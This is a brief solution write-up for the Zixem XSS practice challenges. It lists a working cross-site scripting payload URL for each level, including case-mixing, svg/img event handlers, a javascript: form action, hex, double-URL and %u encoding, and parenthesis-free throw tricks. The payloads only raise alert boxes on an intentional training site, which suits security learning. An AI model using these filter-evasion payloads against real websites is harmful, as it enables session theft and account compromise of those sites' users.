Zixem XSS Challenges

.rst

XSS Challenges from zixem.altervista.org

Level 1

http://www.zixem.altervista.org/XSS/1.php?name=<script>alert(1337)</script>

Level 2

http://www.zixem.altervista.org/XSS/2.php?name=<ScRIpt>alert(1337)</SCript>

Level 3

Escaping %0A (n)

http://zixem.altervista.org/XSS/3.php?name=%0a<svg/onload="alert(1337)">

Level 4

` <img src='htp.pngd'onerror=alert(1337) ' /> `http://zixem.altervista.org/XSS/4.php?img=htp.pngd'onerror=alert(1337)%20

Level 5

` <form action="javascript:alert(1337)" method='get'> `http://zixem.altervista.org/XSS/5.php?name=x&action=javascript:alert(1337)

Level 6

Hex Encoding

`node new Buffer.from('<').toString('hex')`

http://zixem.altervista.org/XSS/6.php?name=zxmx3csvg/onload=alert(1337)x3e

Level 7

Double URL Encoding (<>)

`node encodeURIComponent(encodeURIComponent('<>'))`

http://zixem.altervista.org/XSS/7.php?name=zxm%253csvg/onload=alert(1337)%253e

Level 8

``

Level 9

http://zixem.altervista.org/XSS/9.php?name=zxm<SVg/onload=confirm(1337)>

Level 10

Filtered (

• http://zixem.altervista.org/XSS/10.php?name=zxm');onerror=alert;throw 1337;//
• http://zixem.altervista.org/XSS/10.php?name=zxm');onerror=confirm`1337`;//

Level 8

https://www.zixem.altervista.org/XSS/8.php?name=zxm%u003Csvg/Onload=prompt()//